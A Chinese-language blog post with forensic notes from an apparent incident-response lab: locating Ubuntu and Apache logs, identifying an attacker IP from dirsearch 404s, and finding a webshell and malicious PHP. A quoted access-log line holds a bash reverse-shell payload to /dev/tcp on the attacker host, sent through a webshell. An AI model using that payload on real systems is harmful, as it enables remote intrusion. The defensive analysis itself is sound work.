标签:log 查看 192.168 webserver2003 2022 var 解析 请求
webserver解析
/etc/os-release 查看操作系统 发行版本
netstat -tunal 查看开放端口
或者使用kali nmap -sV -p- 192.168.218.131 查看
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
ubuntu的日志文件路径
/var/log/auth.log 登录认证日志
/var/log/boot.log 系统启动日志
/var/log/btmp 失败启动信息
/var/log/apache2或/var/log/httpd 记录服务器的每个HTTP请求信息,访问时间,请求方法,URL,客户端IP
/var/log/apache2/error.log 记录apache2服务器错误警告信息
拓展
centos日志路径 /var/log/secure
查看access.log文件太乱, cp /var/log/apache2/access.log.1 /var/www/html/access.log
到网站目录,进行web访问下载到本地查看方便
随便拉进一个编译器查看都很方便,看出用dirsearch工具扫描,并且返回状态都为404那么攻击者IP就是192.168.1.7
附常见http响应返回值含义
200,表明该请求被成功地完成,所请求的资源发送到客户端
302,请求的网页被重定向到新的地址
403,禁止访问,服务器收到请求,但拒绝提供服务
404,可连接服务器,但服务器无法取得所请求的网页,请求资源不存在
附日志格式
192.168.1.7 - - [24/Apr/2022:15:27:32 +0000] "GET /data/avatar/1.php?
2022=bash%20-i%20%3E&%20/dev/tcp/192.168.1.7/1234%200%3E&1 HTTP/1.1" 200
242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0"
1.客户端IP地址:192.168.1.7
2.客户端标识符: -
3.用户名: -
4.记录时间:[24/Apr/2022:15:27:32 +0000]
5.请求方法:GET
6.请求的URL:/data/avatar/1.php?2022=bash%20-
i%20%3E&%20/dev/tcp/192.168.1.7/1234%200%3E&1
7.HTTP协议版本:HTTP/1.1
8.服务器响应状态码:200
9.响应大小:242
10.引用来源(Referer):"-"
11.用户代理:"Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0"
攻击产收集平台
hunter
fofa
shodan.io
第一次攻击成功时间就是id 查看权限,明显特征的时间
24/Apr/2022:15:26:42
同时攻击者操作系统也是同一行
Linux x86_64
恶意文件路径也出来了
/var/www/html/data/avatar/1.php 2022
密码进入该目录下cat文件查看
反弹shell后的操作日志就无法记录了
之后就是进入网站目录查看
先查看近期时间修改的
-是文件
d是目录
l代表软链接
第一种方法就是一直找
第二种就是grep "eval" *.php
恶意代码完整路径就是
/var/www/html/footer.php
恶意进程思路先查看网络连接 netstat -tunal
记住centos ubuntu 默认进程 哪些看上去正常进程格式,哪些进程不一样
ps -aux 查看进程
lsof -p pid 查看文件位置
ll /proc/进程PID/exe 查看文件位置
file 文件 查看文件属性
如果没有清楚历史命令
history | grep prism 查看相关命令
版本号
icmp协议
密码
bash
标签:log,
查看,
192.168,
webserver2003,
2022,
var,
解析,
请求
From: https://www.cnblogs.com/yang-ace/p/17971051